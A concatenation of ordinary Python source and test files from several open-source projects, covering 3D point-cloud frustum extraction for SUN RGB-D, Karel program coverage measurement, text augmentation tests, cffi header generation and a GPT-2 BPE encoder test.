print('det idx: %d/%d, data idx: %d' % (det_idx, len(det_id_list), data_idx))
if cache_id != data_idx:
calib = dataset.get_calibration(data_idx)
pc_upright_depth = dataset.get_pointcloud(data_idx)
pc_upright_camera = np.zeros_like(pc_upright_depth)
pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(pc_upright_depth[:, 0:3])
pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:]
if with_down_sample:
idx = down_sample(pc_upright_camera[:, :3], 0.01)
# print(len(idx), len(pc_upright_camera))
pc_upright_camera = pc_upright_camera[idx]
pc_upright_depth = pc_upright_depth[idx]
# img = dataset.get_image(data_idx)
# img_height, img_width, img_channel = img.shape
pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth)
cache = [calib, pc_upright_camera, pc_image_coord]
cache_id = data_idx
else:
calib, pc_upright_camera, pc_image_coord = cache
# 2D BOX: gather the points whose image projection falls inside the detected 2D box
xmin, ymin, xmax, ymax = det_box2d_list[det_idx]
box_fov_inds = (pc_image_coord[:, 0] < xmax) & (pc_image_coord[:, 0] >= xmin) & (
pc_image_coord[:, 1] < ymax) & (pc_image_coord[:, 1] >= ymin)
coord_in_box_fov = pc_image_coord[box_fov_inds, :]
pc_in_box_fov = pc_upright_camera[box_fov_inds, :]
# Get frustum angle (according to center pixel in 2D BOX)
box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0])
uvdepth = np.zeros((1, 3))
uvdepth[0, 0:2] = box2d_center
uvdepth[0, 2] = 20  # arbitrary depth; only the viewing-ray direction matters for the frustum angle
box2d_center_upright_camera = calib.project_image_to_upright_camera(uvdepth)
frustum_angle = -1 * np.arctan2(
box2d_center_upright_camera[0, 2],
box2d_center_upright_camera[0, 0])  # angle with respect to the positive x-axis, as in the Zoox paper
# Subsample points to at most 2048 per frustum.
num_point = pc_in_box_fov.shape[0]
if num_point > 2048:
choice = np.random.choice(pc_in_box_fov.shape[0], 2048, replace=False)
coord_in_box_fov = coord_in_box_fov[choice, :]
pc_in_box_fov = pc_in_box_fov[choice, :]
# Skip detections with too few points in the frustum
if len(pc_in_box_fov) < 5:
continue
id_list.append(data_idx)
type_list.append(det_type_list[det_idx])
box2d_list.append(det_box2d_list[det_idx])
prob_list.append(det_prob_list[det_idx])
input_list.append(pc_in_box_fov.astype(np.float32))
frustum_angle_list.append(frustum_angle)
img_coord_list.append(coord_in_box_fov.astype(np.float32))
calib_K_list.append(calib.K)
calib_R_list.append(calib.Rtilt)
data_dict = {
'id': id_list,
'type': type_list,
'box2d': box2d_list,
'box2d_prob': prob_list,
'input': input_list,
'frustum_angle': frustum_angle_list,
'calib_K': calib_K_list,
'calib_R': calib_R_list,
# 'image_coord': img_coord_list,
}
with open(output_filename, 'wb') as f:
pickle.dump(data_dict, f, -1)
print("save in {}".format(output_filename))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gen_train',
action='store_true',
help='Generate train split frustum data with perturbed GT 2D boxes')
parser.add_argument('--gen_val', action='store_true', help='Generate val split frustum data with GT 2D boxes')
parser.add_argument('--gen_val_rgb_detection',
action='store_true',
help='Generate val split frustum data with RGB detection 2D boxes')
parser.add_argument('--num_classes', default=10, type=int, help='19 or 10 categories, default 10')
parser.add_argument('--save_dir',
default='sunrgbd/data/pickle_data',
type=str,
help='directory to save data, default[sunrgbd/data/pickle_data]')
parser.add_argument('--gen_avg_dim', action='store_true', help='get average dimension of each class')
args = parser.parse_args()
my_sunrgbd_dir = 'sunrgbd/mysunrgbd' # change if you do not set default path
if args.num_classes == 10:
type_whitelist = [
'bed', 'table', 'sofa', 'chair', 'toilet', 'desk', 'dresser', 'night_stand', 'bookshelf', 'bathtub'
]
elif args.num_classes == 19:
type_whitelist = [
'bathtub', 'bed', 'bookshelf', 'box', 'chair', 'counter', 'desk', 'door', 'dresser', 'garbage_bin', 'lamp',
'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table', 'tv', 'toilet'
]
else:
assert False, 'please set correct num_classes'
type_whitelist = set(type_whitelist)
if args.gen_avg_dim:
get_box3d_dim_statistics(my_sunrgbd_dir, 'sunrgbd/image_sets/train.txt', type_whitelist)
save_dir = args.save_dir
if not os.path.exists(save_dir):
os.makedirs(save_dir)
if args.gen_train:
extract_frustum_data(my_sunrgbd_dir,
'sunrgbd/image_sets/train.txt',
'training',
output_filename=os.path.join(save_dir, 'sunrgbd_train_aug5x.pickle'),
type_whitelist=type_whitelist,
perturb_box2d=True,
augmentX=5,
with_down_sample=False)
if args.gen_val:
extract_frustum_data(my_sunrgbd_dir,
'sunrgbd/image_sets/val.txt',
'training',
output_filename=os.path.join(save_dir, 'sunrgbd_val.pickle'),
type_whitelist=type_whitelist,
perturb_box2d=False,
augmentX=1,
with_down_sample=False)
if args.gen_val_rgb_detection:
extract_frustum_data_from_rgb_detection(my_sunrgbd_dir,
'./sunrgbd/rgb_detections/sunrgbd_rgb_det_val_classes19_mAP50.2.txt',
'training',
os.path.join(save_dir,'sunrgbd_rgb_det_val.pickle'),
type_whitelist=type_whitelist)
|
program_synthesis/karel/dataset/coverage.py
|
kavigupta/program_synthesis
| 123 |
63720
|
from program_synthesis.karel.dataset import executor
from program_synthesis.karel.dataset import parser_for_synthesis
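# Trace event types that count toward branch coverage vs. statement coverage.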
branch_types = {'if', 'ifElse', 'while'}
stmt_types = {'move', 'turnLeft', 'turnRight', 'putMarker', 'pickMarker'}
class CoverageMeasurer(object):
def __init__(self, code):
self.parser = parser_for_synthesis.KarelForSynthesisParser(
build_tree=True)
self.executor = executor.KarelExecutor()
self.code = code
tree = self.parser.parse(code)
# Statement coverage: actions
self.stmt_coverage = {span: 0 for span in self.parser.action_spans}
# Branch coverage: if, ifelse, while
self.branch_coverage = {(span, cond_value): 0
for span in self.parser.cond_block_spans
for cond_value in (True, False)}
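# Execute the program on one input; returns False when execution yields no output,
# otherwise accumulates statement and branch hit counts from the execution trace.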
def add(self, inp):
out, trace = self.executor.execute(
self.code, None, inp, record_trace=True)
if not out:
return False
for event in trace.events:
if event.type in branch_types:
self.branch_coverage[event.span, event.cond_value] += 1
elif event.type in stmt_types:
self.stmt_coverage[event.span] += 1
return True
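# Report the statement spans and (span, cond_value) branch pairs that were never exercised.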
def uncovered(self):
return (tuple(k for k, v in self.stmt_coverage.items() if v == 0),
tuple(k for k, v in self.branch_coverage.items() if v == 0))
|
test/augmenter/word/test_back_translation.py
|
techthiyanes/nlpaug
| 3,121 |
63741
|
<gh_stars>1000+
import unittest
import os
import torch
from dotenv import load_dotenv
import nlpaug.augmenter.word as naw
import nlpaug.model.lang_models as nml
class TestBackTranslationAug(unittest.TestCase):
@classmethod
def setUpClass(cls):
env_config_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', '.env'))
load_dotenv(env_config_path)
cls.text = 'The quick brown fox jumps over the lazy dog'
cls.texts = [
'The quick brown fox jumps over the lazy dog',
"Seeing all of the negative reviews for this movie, I figured that it could be yet another comic masterpiece that wasn't quite meant to be."
]
cls.eng_model_names = [{
'from_model_name': 'facebook/wmt19-en-de',
'to_model_name': 'facebook/wmt19-de-en',
}
]
def sample_test_case(self, device):
# From English
for model_name in self.eng_model_names:
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], device=device)
augmented_text = aug.augment(self.text)
aug.clear_cache()
self.assertNotEqual(self.text, augmented_text)
augmented_texts = aug.augment(self.texts)
aug.clear_cache()
for d, a in zip(self.texts, augmented_texts):
self.assertNotEqual(d, a)
if device == 'cpu':
self.assertTrue(device == aug.model.get_device())
elif 'cuda' in device:
self.assertTrue('cuda' in aug.model.get_device())
def test_back_translation(self):
if torch.cuda.is_available():
self.sample_test_case('cuda')
self.sample_test_case('cpu')
def test_batch_size(self):
model_name = self.eng_model_names[0]
# 1 per batch
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=1)
aug_data = aug.augment(self.texts)
self.assertEqual(len(aug_data), len(self.texts))
# batch size = input size
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=len(self.texts))
aug_data = aug.augment(self.texts)
self.assertEqual(len(aug_data), len(self.texts))
# batch size > input size
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=len(self.texts)+1)
aug_data = aug.augment(self.texts)
self.assertEqual(len(aug_data), len(self.texts))
# input size > batch size
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=2)
aug_data = aug.augment(self.texts * 2)
self.assertEqual(len(aug_data), len(self.texts)*2)
|
snaek/ffi.py
|
mitsuhiko/snaek
| 272 |
63742
|
import os
import re
import sys
import cffi
from ._compat import PY2
_directive_re = re.compile(r'(?m)^\s*#.*?$')  # strips C preprocessor directive lines, which cffi.cdef cannot parse
def make_ffi(module_path, crate_path, cached_header_filename=None):
"""Creates a FFI instance for the given configuration."""
if cached_header_filename is not None and \
os.path.isfile(cached_header_filename):
with open(cached_header_filename, 'rb') as f:
header = f.read()
if not PY2:
header = header.decode('utf-8')
else:
from .bindgen import generate_header
header = generate_header(crate_path)
header = _directive_re.sub('', header)
if os.environ.get('SNAEK_DEBUG_HEADER') == '1':
sys.stderr.write('/* generated header for "%s" */\n' % module_path)
sys.stderr.write(header)
sys.stderr.write('\n')
sys.stderr.flush()
ffi = cffi.FFI()
ffi.cdef(header)
ffi.set_source(module_path, None)
return ffi
|
google-api-client-generator/src/googleapis/codegen/cpp_import_manager_test.py
|
cclauss/discovery-artifact-manager
| 178 |
63751
|
#!/usr/bin/python2.7
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for cpp_import_manager."""
__author__ = '<EMAIL> (<NAME>)'
from google.apputils import basetest
from googleapis.codegen.cpp_import_manager import CppImportManager
class MockSchema(object):
"""Mock schema used in place of real schema objects."""
def __init__(self):
self._template_values_dict = {}
def SetTemplateValue(self, template_name, template_value):
self._template_values_dict[template_name] = template_value
def GetTemplateValue(self, template_name):
return self._template_values_dict.get(template_name)
class CppImportManagerTest(basetest.TestCase):
def setUp(self):
super(CppImportManagerTest, self).setUp()
self.mock_schema = MockSchema()
self.import_manager = CppImportManager(self.mock_schema)
def testAddImportAndCommit(self):
# Add a com.google import.
com_google_import = '"base/integral_types.h"'
self.assertTrue(self.import_manager.AddImport(com_google_import))
self.assertFalse(self.import_manager.platform_imports)
self.assertFalse(self.import_manager.other_imports)
self.assertTrue(self.import_manager.google_imports)
# There are no platform imports for C++
platform_import = '<string>'
self.assertTrue(self.import_manager.AddImport(platform_import))
self.assertTrue(self.import_manager.platform_imports)
# Add a random thing
other_import = '"Module.h"'
self.import_manager.AddImport(other_import)
# Assert the contents of google, other and java imports.
expected_google_import_set = set()
expected_google_import_set.add(com_google_import)
sorted_expected_google_import_set = sorted(expected_google_import_set)
self.assertEquals(sorted_expected_google_import_set,
list(self.import_manager.google_imports))
self.assertEquals([other_import],
list(self.import_manager.other_imports))
self.assertEquals([platform_import],
list(self.import_manager.platform_imports))
# Assert the contents of class_name_to_qualified_name map.
self.assertEquals(
com_google_import,
self.import_manager._class_name_to_qualified_name[com_google_import])
# Assert that commit import works.
# The import_manager combines the platform and google imports together
# but each segment is first sorted.
expected_import_list = [
sorted([platform_import]) + sorted_expected_google_import_set,
[other_import]]
self.assertEquals(
expected_import_list,
self.mock_schema.GetTemplateValue('importManager').ImportLists())
if __name__ == '__main__':
basetest.main()
|
pynacl/lib/__init__.py
|
cohortfsllc/cohort-cocl2-sandbox
| 2,151 |
63823
|
#!/usr/bin/python
# Copyright (c) 2014 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Unfortunately python does not have a good way to deal with module name
# clashes. The easiest way to get around it is to use a layer of indirection.
# For example, if pynacl.platform needs to use the python root platform module,
# it should import lib instead and use lib.platform.
# List name clashed modules here in alphabetical order
import platform
|
autograd/numpy/__init__.py
|
gautam1858/autograd
| 6,119 |
63893
|
<filename>autograd/numpy/__init__.py<gh_stars>1000+
from __future__ import absolute_import
from .numpy_wrapper import *
from . import numpy_boxes
from . import numpy_vspaces
from . import numpy_vjps
from . import numpy_jvps
from . import linalg
from . import fft
from . import random
|
tests/test_bpe.py
|
Pimax1/keras-gpt-2
| 131 |
63902
|
import os
from unittest import TestCase
from keras_gpt_2 import get_bpe_from_files
class TestBPE(TestCase):
def test_encode_and_decode(self):
current_path = os.path.dirname(os.path.abspath(__file__))
toy_checkpoint_path = os.path.join(current_path, 'toy_checkpoint')
encoder_path = os.path.join(toy_checkpoint_path, 'encoder.json')
vocab_path = os.path.join(toy_checkpoint_path, 'vocab.bpe')
bpe = get_bpe_from_files(encoder_path, vocab_path)
text = 'Power, give me more power!'
indices = bpe.encode(text)
self.assertEqual([13434, 11, 1577, 502, 517, 1176, 0], indices)
self.assertEqual(text, bpe.decode(indices))
self.assertEqual(text, bpe.decode(bpe.encode(text)))
|